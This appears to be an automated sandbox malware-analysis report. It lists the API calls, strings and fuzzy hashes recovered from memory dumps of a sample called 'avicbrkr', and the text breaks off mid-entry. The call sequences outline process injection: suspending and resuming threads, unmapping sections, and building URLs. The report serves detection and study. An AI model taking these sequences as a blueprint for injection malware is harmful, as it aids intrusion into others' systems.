                      • Opcode ID: 2a6b46eec59cb5b55b9812063fd27f72f2b4d442502c0d982c14d6cb6cf2ffbd
                      • Instruction ID: df9dd668917ee9f3c61caa351e6cc90a30b2eac286aa7851111f10cbfaa7fd4f
                      • Opcode Fuzzy Hash: 2a6b46eec59cb5b55b9812063fd27f72f2b4d442502c0d982c14d6cb6cf2ffbd
                      • Instruction Fuzzy Hash: 9E3181B1914308FFEB229FA5DC09BAE7B79EB04325F204555F911A21E0C3718E449B50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00387665: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,003711C5,000004D2), ref: 0038769D
                        • Part of subcall function 00387665: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,003711C5,000004D2), ref: 003876A9
                        • Part of subcall function 00387665: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 003876B7
                        • Part of subcall function 00387665: lstrcpy.KERNEL32(00000000), ref: 003876D2
                      • lstrlen.KERNEL32(00000000,?,00000F00), ref: 00377C6C
                        • Part of subcall function 00377A7F: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 00377AA5
                        • Part of subcall function 00377A7F: HeapFree.KERNEL32(00000000,?,00000000), ref: 00377B09
                      • StrTrimA.SHLWAPI(00000000,0039740C), ref: 00377CF6
                        • Part of subcall function 00389765: lstrlen.KERNEL32(00000000,~FvR9,00000000,00000000,00374E8A,00000000,00000000,00000000,00000000,0037D7DB,00000000,00000000,?,00000001,0037D9CC), ref: 0038976E
                        • Part of subcall function 00389765: memcpy.NTDLL(00000000,?,00000000,00000001,?,00000001,0037D9CC), ref: 00389791
                        • Part of subcall function 00389765: memset.NTDLL ref: 003897A0
                      • HeapFree.KERNEL32(00000000,?,00000000), ref: 00377D13
                      • DeleteFileA.KERNEL32(00000000,00000000,?,?,0039EE29,00000000,?,00000F00), ref: 00377D1B
                      • HeapFree.KERNEL32(00000000,00000000,0039EE29), ref: 00377D2A
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$FileFree$Timelstrlen$AllocateCurrentDeleteNameSystemTempThreadTrimlstrcpymemcpymemset
                      • String ID: ss: *.*.*.*
                      • API String ID: 3832528039-2676197480
                      • Opcode ID: bc50f57ada28eab68d58cdac83d9daec3d13a21e13c49e47677f2e928c6b0689
                      • Instruction ID: d7fe3ea6b4c2a8236600d80756f27ae571d899a5d8399d6919afc7b1459628e5
                      • Opcode Fuzzy Hash: bc50f57ada28eab68d58cdac83d9daec3d13a21e13c49e47677f2e928c6b0689
                      • Instruction Fuzzy Hash: 22213272A04205BFDB22EFE9DC85FEF7BACAF58310F050465F509E6251E6759A048760
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 0038875C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,003713BC,00000000,0039D298,00000000,?,?), ref: 00388777
                        • Part of subcall function 0038875C: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,003713BC,00000000,0039D298,00000000,?,?), ref: 00388788
                        • Part of subcall function 0038875C: CloseHandle.KERNEL32(00000000), ref: 0038879B
                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,pnls), ref: 0038D784
                      • GetLastError.KERNEL32 ref: 0038D801
                        • Part of subcall function 0038D5E3: memset.NTDLL ref: 0038D605
                        • Part of subcall function 0038D5E3: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 0038D69C
                        • Part of subcall function 0038D5E3: WaitForSingleObject.KERNEL32(00000064), ref: 0038D6AA
                        • Part of subcall function 0038D5E3: SuspendThread.KERNEL32(?), ref: 0038D6C2
                        • Part of subcall function 0038D5E3: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 0038D737
                        • Part of subcall function 0038D5E3: ResumeThread.KERNEL32(?), ref: 0038D748
                      • CloseHandle.KERNEL32(?), ref: 0038D7F9
                      • CloseHandle.KERNEL32(?), ref: 0038D813
                      • GetLastError.KERNEL32 ref: 0038D81B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CloseErrorHandleLastProcessThread$OpenResume$ObjectSingleSuspendWaitWow64memset
                      • String ID: pnls
                      • API String ID: 1160281849-141991303
                      • Opcode ID: b546bada66c2a57b7ec836c382397c61f3a8998cb1717b0b747b5f179d1c4914
                      • Instruction ID: 11f6ca29724e21531dfa8b7a48865849b065fa4f194b342d5ff5554463172fb0
                      • Opcode Fuzzy Hash: b546bada66c2a57b7ec836c382397c61f3a8998cb1717b0b747b5f179d1c4914
                      • Instruction Fuzzy Hash: 26215E72914369BFDF137FA4DC898AEBBB8EB44354F0149B6F901A22A0D6724D048B90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00377F9C: StrChrA.SHLWAPI(00000001,0000000D), ref: 00377FE6
                      • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00378064
                      • memcpy.NTDLL(00000000,http://,00000007,?,?,?,0037CF58,00000000), ref: 0037808A
                      • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,0037CF58,00000000), ref: 00378099
                      • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,0037CF58,00000000), ref: 003780AB
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy$AllocateHeap
                      • String ID: http://$https://
                      • API String ID: 4068229299-1916535328
                      • Opcode ID: 249e8e6ee7a20dcb52f1d484212b8621e8a35c34de73809b299db449438b2c79
                      • Instruction ID: 74b9800d0ffbc23ab22b179e5a2b96103ed6f3506623e9a493a412148f82e8e5
                      • Opcode Fuzzy Hash: 249e8e6ee7a20dcb52f1d484212b8621e8a35c34de73809b299db449438b2c79
                      • Instruction Fuzzy Hash: AF218172940215BBDF339FA8CC45F9ABBACEF04784F158052F904DB251EA75DD858B90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00634958
                      • GetFileSize.KERNEL32(00000000,00000000,?,!Cc,00632BAA,0063763C,00000000,00000000,?,00000000,0063306A,?,?), ref: 00634968
                        • Part of subcall function 0063115F: RtlAllocateHeap.NTDLL(00000000,?,00633BA9), ref: 0063116B
                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00634994
                      • GetLastError.KERNEL32(?,!Cc,00632BAA,0063763C,00000000,00000000,?,00000000,0063306A,?,?), ref: 006349B9
                      • CloseHandle.KERNEL32(000000FF), ref: 006349CA
                        • Part of subcall function 00631174: HeapFree.KERNEL32(00000000,?,00633C0E), ref: 00631180
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$Heap$AllocateCloseCreateErrorFreeHandleLastReadSize
                      • String ID: !Cc
                      • API String ID: 3493789272-3374438881
                      • Opcode ID: a10890df6a114c137252ac828cc0f771be988618bf38c8d75638ad95e9dbde9e
                      • Instruction ID: 9d8d65b33ca5be758a37f09b649443def841ce5a5d2315db59de38d854c323ee
                      • Opcode Fuzzy Hash: a10890df6a114c137252ac828cc0f771be988618bf38c8d75638ad95e9dbde9e
                      • Instruction Fuzzy Hash: 02118472500214BFDB215F64CC89BEFBB9FEB45364F114625F915972A0DA70AD418AE0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00387665: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,003711C5,000004D2), ref: 0038769D
                        • Part of subcall function 00387665: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,003711C5,000004D2), ref: 003876A9
                        • Part of subcall function 00387665: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 003876B7
                        • Part of subcall function 00387665: lstrcpy.KERNEL32(00000000), ref: 003876D2
                        • Part of subcall function 003777C6: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0037787C
                        • Part of subcall function 003777C6: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0037789D
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 003779FD
                      • lstrlen.KERNEL32(00000000,?,00000000,?,?,00371255,00000000,00000000,00000004), ref: 00377A15
                      • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00377A29
                      • mbstowcs.NTDLL ref: 00377A39
                        • Part of subcall function 00377E31: GetSystemTimeAsFileTime.KERNEL32(00377A4C,?,?,?,?,00000008,00377A4C,00000000,?), ref: 00377E4E
                        • Part of subcall function 00377E31: memcpy.NTDLL(00377A4C,?,00000009,?,?,?,?,00000008,00377A4C,00000000,?), ref: 00377E70
                        • Part of subcall function 00377E31: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 00377E88
                        • Part of subcall function 00377E31: lstrlenW.KERNEL32(00000000,00000001,00377A4C,?,?,?,?,?,?,?,00000008,00377A4C,00000000,?), ref: 00377EA8
                        • Part of subcall function 00377E31: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00377ECD
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00377A57
                      • CloseHandle.KERNEL32(?), ref: 00377A61
                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 00377A70
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$FileFreeTime$AllocateSystemlstrlen$CloseCreateCurrentHandleLocalNameObjectSingleTempThreadWaitlstrcpymbstowcsmemcpy
                      • String ID:
                      • API String ID: 1571466277-0
                      • Opcode ID: 476d3fdf4e68a3e7dd04208e12d63b974cb6fe3877491acc15d882b3b28377cd
                      • Instruction ID: 26bceb8ccb24508eea9555639d7abef79a34994d4719dc8d2b5585953ea2c5ca
                      • Opcode Fuzzy Hash: 476d3fdf4e68a3e7dd04208e12d63b974cb6fe3877491acc15d882b3b28377cd
                      • Instruction Fuzzy Hash: 6C11E332149314BBE2336B20AC8EF6F3E6CEB457A1F108512F645A53E1E66B4D5086E0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • CreateFileW.KERNEL32(0063763C,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00631611
                      • CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,00637614), ref: 00631627
                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,00637614), ref: 0063163F
                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,00637614), ref: 00631651
                      • GetLastError.KERNEL32(?,00000000,?,00637614), ref: 0063165F
                      • GetLastError.KERNEL32(?,00000000,?,00637614), ref: 0063166C
                      • GetLastError.KERNEL32(?,00637614), ref: 0063167B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$ErrorLast$Create$MappingSizeView
                      • String ID:
                      • API String ID: 2408169653-0
                      • Opcode ID: 73d9eecfad116d980135a68303c4c0382e50b74b7ec37b6c0fb2068e127e086a
                      • Instruction ID: d15e64cdb11d7aa980aa7dbb054fab52bd62eda4e0662fee434a031bb6a8e793
                      • Opcode Fuzzy Hash: 73d9eecfad116d980135a68303c4c0382e50b74b7ec37b6c0fb2068e127e086a
                      • Instruction Fuzzy Hash: 49016171206224BBD3246BB1DD8EEAB7FAEDF477B4F145504F90A96260C6214845C6F0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrlen.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,003728E5,00371F67,00000000,00000000,?,?,?,00374C4E,00000000), ref: 003724BF
                      • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 003724D2
                      • lstrcpy.KERNEL32(00000008,00000000), ref: 003724F4
                      • CreateThread.KERNEL32(00000000,00000000,0037245F,00000000,00000000,00000000), ref: 0037250C
                      • CloseHandle.KERNEL32(00000000), ref: 00372517
                      • GetLastError.KERNEL32(?,?,?,003728E5,00371F67,00000000,00000000,?,?,?,00374C4E,00000000,0039E1CF,0037D7DB,00000000,00000000), ref: 0037251F
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00372530
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateCloseCreateErrorFreeHandleLastThreadlstrcpylstrlen
                      • String ID:
                      • API String ID: 521669393-0
                      • Opcode ID: 0cad7e5f59cc702ecc92d57a0064b99513c4e0af916d8cd7bac2f687f5b0ba1a
                      • Instruction ID: 75c25e1801e360226637c8e976bf233ef537518966794703ff9fb62f9941a673
                      • Opcode Fuzzy Hash: 0cad7e5f59cc702ecc92d57a0064b99513c4e0af916d8cd7bac2f687f5b0ba1a
                      • Instruction Fuzzy Hash: 7C115172504249FFDB229FA5DC88CAFBBBCFB05354B11842AF64AD3250D7359D409B60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrcmpi.KERNEL32(00000000,Main), ref: 00375E8F
                      • RtlEnterCriticalSection.NTDLL(0039D508), ref: 00375EA1
                      • RtlLeaveCriticalSection.NTDLL(0039D508), ref: 00375EB4
                      • lstrcmpi.KERNEL32(0039D520,00000000), ref: 00375ED5
                      • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,00379A23,00000000), ref: 00375EE9
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                      • String ID: Main
                      • API String ID: 1266740956-521822810
                      • Opcode ID: fac605b6a693279bffc9123e057015e3c6c15acd14f6b59dd4ff5263656039e8
                      • Instruction ID: d2f26892784824d9594b3ec348d64af3963ce5a6b49a4ef001422539191313fd
                      • Opcode Fuzzy Hash: fac605b6a693279bffc9123e057015e3c6c15acd14f6b59dd4ff5263656039e8
                      • Instruction Fuzzy Hash: 1D11C435515204EFDF1ADF18D949A99B7BCFF05325F06402AE509D3290D7B59D00CBD4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 00378360
                      • memcpy.NTDLL(00000000,00000002,-000000F6,?,?,?,0037C6E6), ref: 00378371
                      • memcpy.NTDLL(00000000,0037C6E6,0037C6E6,?,?,?,?,?,?,0037C6E6), ref: 00378387
                      • memcpy.NTDLL(00000000,?,?,00000000,0037C6E6,0037C6E6,?,?,?,?,?,?,0037C6E6), ref: 00378399
                      • memcpy.NTDLL(00000000,003973F8,00000002,00000000,?,?,00000000,0037C6E6,0037C6E6,?,?,?,?,?,?,0037C6E6), ref: 003783AC
                      • memcpy.NTDLL(00000000,?,00000002,?,?,?,?,?,?,0037C6E6), ref: 003783C1
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy$AllocateHeap
                      • String ID:
                      • API String ID: 4068229299-0
                      • Opcode ID: 00aef71375c307affad4c3f6545e60bbddc7972e1b085f0189f0119c39a8a784
                      • Instruction ID: c91a80cb62bbbe7af6ddd77aac0c796f8da5c5d8c2881de65b734b24d867d0f9
                      • Opcode Fuzzy Hash: 00aef71375c307affad4c3f6545e60bbddc7972e1b085f0189f0119c39a8a784
                      • Instruction Fuzzy Hash: AA416E76D00209FBCF22CFA8CC8499EBBB8FF44344F144056E904A7251E775DA10DB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memcpy.NTDLL(00000000,00379FA5,00000000,?,?,?,00379FA5,00000000,?,?,8B50F445,0037AE2C), ref: 00379E02
                      • memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,0037AE2C,?,?,?,?,?,0037AE2C,?,00397048,00000000), ref: 00379E88
                      • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,0037AE2C,?,?,?,?,?,0037AE2C), ref: 00379EBF
                      • LocalFree.KERNEL32(0037AE2C,?,?,?,?,?,?,?,?,8B50F445,0037AE2C,?,?,?,?,?), ref: 00379ECD
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy$FreeLocal
                      • String ID: q9$q9
                      • API String ID: 2365274387-4090950484
                      • Opcode ID: 7d984b7d19eaa954ae3f5a35201a8627d770b54d25ae2bec54bd86b1b3c7fdf0
                      • Instruction ID: 50c35991aaf2ebecc17377ebef4b20d69dd42cdc8b4251c6d770f354f505b3d3
                      • Opcode Fuzzy Hash: 7d984b7d19eaa954ae3f5a35201a8627d770b54d25ae2bec54bd86b1b3c7fdf0
                      • Instruction Fuzzy Hash: 74311DB680021AAFDF22EF65DC4599F3FA8FF14360B154166FC0896211E735DE609BE1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 00632282
                        • Part of subcall function 00633223: OpenProcess.KERNEL32(00000400,00000000,00637614,0063618C,0000000C,?,?,00631718,00000000,?,00637614), ref: 0063323E
                        • Part of subcall function 00633223: IsWow64Process.KERNEL32(00637624,?,0063618C,0000000C,?,?,00631718,00000000,?,00637614), ref: 0063324F
                        • Part of subcall function 00633223: CloseHandle.KERNEL32(00637624), ref: 00633262
                        • Part of subcall function 00633CB2: RtlNtStatusToDosError.NTDLL(C0000002), ref: 00633CDF
                        • Part of subcall function 00633CB2: SetLastError.KERNEL32(00000000,?,006322DE,00000000,0063244E,0063244E,00000004,?,00000000,00000000,0063605C,00000000), ref: 00633CE6
                      • ResumeThread.KERNEL32(?,00000000,0063244E,CCCCFEEB,00000000,0063244E,0063244E,00000004,?,00000000,00000000,0063605C,00000000), ref: 0063230D
                      • WaitForSingleObject.KERNEL32(00000064), ref: 0063231B
                      • SuspendThread.KERNEL32(?), ref: 0063232E
                        • Part of subcall function 00633C91: RtlNtStatusToDosError.NTDLL(00000000), ref: 00633CA9
                        • Part of subcall function 00632102: memset.NTDLL ref: 00632130
                        • Part of subcall function 00632102: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 006321BA
                        • Part of subcall function 00632102: WaitForSingleObject.KERNEL32(00000064), ref: 006321C8
                        • Part of subcall function 00632102: SuspendThread.KERNEL32(?), ref: 006321DB
                        • Part of subcall function 00631C29: memcpy.NTDLL(?,CCCCFEEB,?,?,?,00632386,?,00632386,00632386,?,?,?,?,00000000), ref: 00631D5F
                        • Part of subcall function 00631C29: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,00632386,?,00632386,00632386,?,?,?,?,00000000), ref: 00631DB0
                        • Part of subcall function 00631C29: memcpy.NTDLL(?,00632486,00000800,?,?,?,00000000), ref: 00631E20
                        • Part of subcall function 00631C29: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00631E4B
                        • Part of subcall function 00631C29: RtlNtStatusToDosError.NTDLL(00000000), ref: 00631E52
                        • Part of subcall function 00631C29: CloseHandle.KERNEL32(00000000), ref: 00631E61
                        • Part of subcall function 00631C29: memset.NTDLL ref: 00631E75
                      • GetLastError.KERNEL32(00000000,0063244E,0063244E,00000004,?,00000000,00000000,0063605C,00000000), ref: 0063239A
                      • ResumeThread.KERNEL32(?), ref: 006323A5
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorThread$ResumeStatusmemcpymemset$CloseHandleLastObjectProcessSingleSuspendWait$OpenSectionUnmapViewWow64
                      • String ID:
                      • API String ID: 1919866759-0
                      • Opcode ID: 094fbb751018d14458a6e2ae9c26b1a9eebc32180639e3047258720aba464b8f
                      • Instruction ID: b1207e6920b6d523ef6886ca4cd66915c7f82a586e5d3456ad6f8e8c5ad2ebda
                      • Opcode Fuzzy Hash: 094fbb751018d14458a6e2ae9c26b1a9eebc32180639e3047258720aba464b8f
                      • Instruction Fuzzy Hash: DE31F27190012ABFDB21AF64CC95ADEBBBAFF04360F008165F919AA250C7349E54CBD0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrlenW.KERNEL32(?), ref: 00378F8D
                      • wcstombs.NTDLL ref: 00378FAD
                        • Part of subcall function 00378E10: RtlAllocateHeap.NTDLL(00000000,00397045,?), ref: 00378EB4
                        • Part of subcall function 00378E10: memcpy.NTDLL(00000000,00000000,00000000), ref: 00378ECB
                        • Part of subcall function 00378E10: HeapFree.KERNEL32(00000000,00000000), ref: 00378EDE
                        • Part of subcall function 00378E10: memcpy.NTDLL(00000000,?,?), ref: 00378EED
                        • Part of subcall function 00378E10: HeapFree.KERNEL32(00000000,00000000,?), ref: 00378F51
                      • lstrlen.KERNEL32(00000000), ref: 00378FD1
                      • mbstowcs.NTDLL ref: 00378FF3
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00379005
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037901F
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$lstrlenmemcpy$Allocatembstowcswcstombs
                      • String ID:
                      • API String ID: 414137170-0
                      • Opcode ID: 8e92442cb34799a04222be7cb38b888327c1bce0fe9c227d0338451397095742
                      • Instruction ID: dd023177d506136d2f3d96c0547fd99a21bbf6a02362b6bd777be9128a5c2e2e
                      • Opcode Fuzzy Hash: 8e92442cb34799a04222be7cb38b888327c1bce0fe9c227d0338451397095742
                      • Instruction Fuzzy Hash: 0A214F3291020AFFDF229FA4EC09F9A7F7DEB44350F108566F604A61A0DB7A9960DB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • OpenEventA.KERNEL32(00100000,00000000), ref: 0037D475
                      • CreateEventA.KERNEL32(0039D2D8,00000001,00000000), ref: 0037D490
                      • GetLastError.KERNEL32 ref: 0037D49D
                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0037D4C0
                      • InterlockedDecrement.KERNEL32(0039D18C), ref: 0037D4EC
                        • Part of subcall function 003713D6: SetEvent.KERNEL32(0039D29C,0037D502), ref: 003713E0
                        • Part of subcall function 003713D6: CloseHandle.KERNEL32(0039D29C), ref: 003713F5
                        • Part of subcall function 003713D6: HeapDestroy.KERNEL32(0039D188), ref: 00371405
                      • RtlExitUserThread.NTDLL(00000000), ref: 0037D503
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Event$CloseCreateDecrementDestroyErrorExitHandleHeapInterlockedLastMultipleObjectsOpenThreadUserWait
                      • String ID:
                      • API String ID: 3948313429-0
                      • Opcode ID: 20591f0fdb3ae8de3e3d109b0c3875614a75993796a83dd7af0f230172679161
                      • Instruction ID: aee27759c21ebd504439f1f5e7939a6ab4450fbf58a057c98b7a4f7d649b5708
                      • Opcode Fuzzy Hash: 20591f0fdb3ae8de3e3d109b0c3875614a75993796a83dd7af0f230172679161
                      • Instruction Fuzzy Hash: BB217271A04204BFCB22AFE9DC8A99DB7BCEB44370F10456AF555E22E0D6759D408F50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • CreateFileW.KERNEL32(00637614,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 00634A00
                      • GetLastError.KERNEL32(?,00632D15,00000000,00637614,?,00001FD1,00000000,00000000,?,?,00631841,?,?), ref: 00634A0D
                      • WriteFile.KERNEL32(00000000,?,00001000,00637614,00000000), ref: 00634A23
                      • SetEndOfFile.KERNEL32(00000000,?,00632D15,00000000,00637614,?,00001FD1,00000000,00000000,?,?,00631841,?,?), ref: 00634A2E
                      • GetLastError.KERNEL32(?,00632D15,00000000,00637614,?,00001FD1,00000000,00000000,?,?,00631841,?,?), ref: 00634A36
                      • CloseHandle.KERNEL32(00000000), ref: 00634A3F
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$ErrorLast$CloseCreateHandleWrite
                      • String ID:
                      • API String ID: 2256172639-0
                      • Opcode ID: b30089ba65768cd2ed73c44106d9f8eee9049b6f604e8ac18ce8d167cf75a349
                      • Instruction ID: 1eb4ab6b5afbb513eafadaf1af7b1aab45ab3fc542b8c762129c74d0bc6673d6
                      • Opcode Fuzzy Hash: b30089ba65768cd2ed73c44106d9f8eee9049b6f604e8ac18ce8d167cf75a349
                      • Instruction Fuzzy Hash: BEF01D32140124BBC7205B65ED4DEAFBF6EEB466B1F009114FE1AD22A0DB319805D6E4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 0038E647
                      • SetLastError.KERNEL32(00000000,?,?,?), ref: 0038E69B
                        • Part of subcall function 0038E5C9: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,0038E794,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 0038E5D2
                        • Part of subcall function 0038E5C9: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 0038E5E5
                      • WaitForSingleObject.KERNEL32(?,?), ref: 0038E81A
                      • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 0038E82B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Time$ErrorFileLastObjectSingleSleepSystemWait_aulldivmemset
                      • String ID: vids
                      • API String ID: 2736876184-3767230166
                      • Opcode ID: 6a6f984ee3baa6e30dfc6d051240ff8f828d8e908aae45e68cc7445b999ee18d
                      • Instruction ID: 531032a55d2d181815c436954a47f612ee0f2d0e2a6bb807e60a7b678aed8389
                      • Opcode Fuzzy Hash: 6a6f984ee3baa6e30dfc6d051240ff8f828d8e908aae45e68cc7445b999ee18d
                      • Instruction Fuzzy Hash: E28108B1D10229EFCF12EFA4C88599DBBB9FF48700F11819AF419AB251D7719A41CF60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 0038AB6D: InterlockedIncrement.KERNEL32(?), ref: 0038ABBE
                        • Part of subcall function 0038AB6D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0038AC42
                        • Part of subcall function 0038AB6D: RtlLeaveCriticalSection.NTDLL(0039D234), ref: 0038AC49
                      • OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,0000001C), ref: 0038BDE0
                      • CloseHandle.KERNEL32(00000000), ref: 0038BDFE
                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0038BE66
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • GetSystemTimeAsFileTime.KERNEL32(00000008,00000014), ref: 0038BEE5
                        • Part of subcall function 0038AC59: RtlLeaveCriticalSection.NTDLL(00000000), ref: 0038ACD6
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Time$CriticalFileHeapLeaveSectionSystem$AllocateCloseFreeHandleIncrementInterlockedOpenProcess
                      • String ID: o
                      • API String ID: 1684844739-252678980
                      • Opcode ID: 8f7a231bbf3470d0a02444d4d364a2764b142eba9002efbe7d0570c62530b107
                      • Instruction ID: dc373099cbadf12c3794ecb29ea5f2cb66168bcdade81940f7f571b576b38a2c
